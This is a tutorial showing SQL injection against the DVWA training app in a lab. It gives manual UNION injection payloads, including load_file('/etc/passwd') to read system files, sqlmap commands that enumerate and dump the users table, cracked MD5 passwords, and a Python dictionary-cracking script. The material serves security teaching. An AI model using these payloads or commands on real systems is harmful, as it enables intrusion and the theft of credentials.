SQLMap: SQL Injection Example Against DVWA
Source: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/
Background
Before reaching for SQLMAP it is worth checking by hand whether injection is possible at all. SQLMAP is only a helper tool; we should understand the underlying process, because everything SQLMAP does can also be done manually.
Manual process to test for the vulnerability
Check whether our site is vulnerable
1' or '2'='2
Next we need to find out how many columns the query returns, by growing the UNION until the database errors.
' and 1=1 union select 1,2 #
' and 1=1 union select 1,2,3 #
The first payload succeeds and the second fails, which shows that the query only returns 2 columns.
Now let's perform the injection.
' union SELECT 1, user() -- '
' and 1=1 union select database(),version() #
' union SELECT 1, user() #
' and 1=1 union select null,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='dvwa' #
' and 1=1 union select first_name,password from dvwa.users #
' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' #
' union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'user_id' #
' union select user, password FROM users #
' union SELECT 1, load_file('/etc/hosts') #
' union SELECT 1, load_file('/etc/passwd') #
Since 1,2,3 produced an error, we know the result set has only 2 columns, which is why every payload above selects exactly two expressions (padding with 1 or null where only one value is wanted). Note that load_file() only returns data when the MySQL account the application connects with has the FILE privilege and secure_file_priv permits reading that path.
Using SQLMAP
Parameters we use and their meaning
-u        the target URL
--cookie  sends / emulates a Cookie header
To obtain the cookie we have to capture it, for example with the Firefox add-on Tamper Data. The PHPSESSID must belong to a logged-in DVWA session; otherwise DVWA redirects to its login page and SQLMAP ends up testing that instead. Example:
Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
--dbs           lists the databases if the injection succeeds.
-D              selects the database to attack.
--tables        lists the tables of the database given with -D.
-T              selects the table to work on (used with --columns and --dump below).
--columns       lists the columns of the table given with -T.
--current-user  shows the database user the application's queries run as.
--users         lists all users of the SQL instance.
--passwords     returns the password hashes of the SQL instance's users (database accounts, not the DVWA application users in dvwa.users).
--dump          dumps the rows of the selected table.
Example execution
List the available databases
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs
Result:
[07:02:08] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] mediawiki
[*] moodle
[*] mysql
[*] performance_schema
[*] snort
List the tables in the dvwa database
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables
Result:
[07:08:39] [INFO] fetching tables for database: 'dvwa'
[07:08:39] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
Check the column layout of the users table
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns
Result:
[07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa'
[07:11:51] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+
Dump the passwords
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump
--dump also tries to crack the hashed passwords it finds. You will be asked whether to use the dictionary bundled with SQLMAP or your own. This works so quickly here because DVWA stores plain, unsalted MD5 hashes: every candidate word needs a single hash computation that is compared against all rows at once.
Result:
[07:15:16] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[07:15:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[07:15:30] [INFO] starting 2 processes
[07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[07:16:00] [INFO] postprocessing table dump
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                          | password                                    | last_name | first_name |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
So we have recovered the passwords of every DVWA application user (the rows of dvwa.users; these are not the MySQL accounts, which --users and --passwords would target) :)
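What --dump's dictionary step does, as an added Python example that is not part of the original page or of SQLMAP: the hashes are copied from the dump above, while the wordlist and the suffix list are small constructed stand-ins for SQLMAP's wordlist.zip and its "common password suffixes" option. The `demo` user in the usage section is also constructed, to show a password that only falls once suffixes are appended.

```python
import hashlib

# Hashes copied from the sqlmap dump on this page (dvwa.users.password,
# unsalted MD5). admin and smithy share a hash because they share a password.
DVWA_HASHES = {
    "admin":   "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337":    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo":   "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy":  "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed stand-ins for sqlmap's wordlist.zip and its "common password
# suffixes" option; the real lists are far larger.
WORDLIST = ["123456", "password", "letmein", "abc123", "charley", "dragon", "qwerty"]
SUFFIXES = ["", "1", "123", "!", "2012"]


def md5_hex(text):
    """Hex MD5 of a string, the 'md5_generic_passwd' format sqlmap detected."""
    return hashlib.md5(text.encode()).hexdigest()


def candidates(wordlist, suffixes):
    """Every word with every suffix appended (the empty suffix is the bare word)."""
    for word in wordlist:
        for suffix in suffixes:
            yield word + suffix


def crack_md5(hashes, wordlist, suffixes=("",)):
    """Return {hash: plaintext} for each target hash hit by a candidate.
    With unsalted hashes one MD5 per candidate is checked against every
    target at once, which is why a wordlist run finishes in seconds."""
    wanted = set(hashes)
    found = {}
    for cand in candidates(wordlist, suffixes):
        digest = md5_hex(cand)
        if digest in wanted and digest not in found:
            found[digest] = cand
            if len(found) == len(wanted):
                break  # nothing left to crack, stop early
    return found


def crack_users(user_hashes, wordlist, suffixes=("",)):
    """Map each username to its recovered password (None if not cracked)."""
    found = crack_md5(user_hashes.values(), wordlist, suffixes)
    return {user: found.get(h) for user, h in user_hashes.items()}


if __name__ == "__main__":
    print(crack_users(DVWA_HASHES, WORDLIST))
    # Constructed: a user whose password only falls with the suffix expansion.
    extra = dict(DVWA_HASHES, demo=md5_hex("letmein123"))
    print(crack_users(extra, WORDLIST)["demo"])            # not cracked
    print(crack_users(extra, WORDLIST, SUFFIXES)["demo"])  # cracked
```

The suffix expansion multiplies the candidate count by the number of suffixes, which is why sqlmap flags that option as slow. A salted, deliberately slow hash (bcrypt, scrypt, Argon2) removes the one-hash-for-all-rows shortcut and is the fix on the storage side, independent of the injection itself.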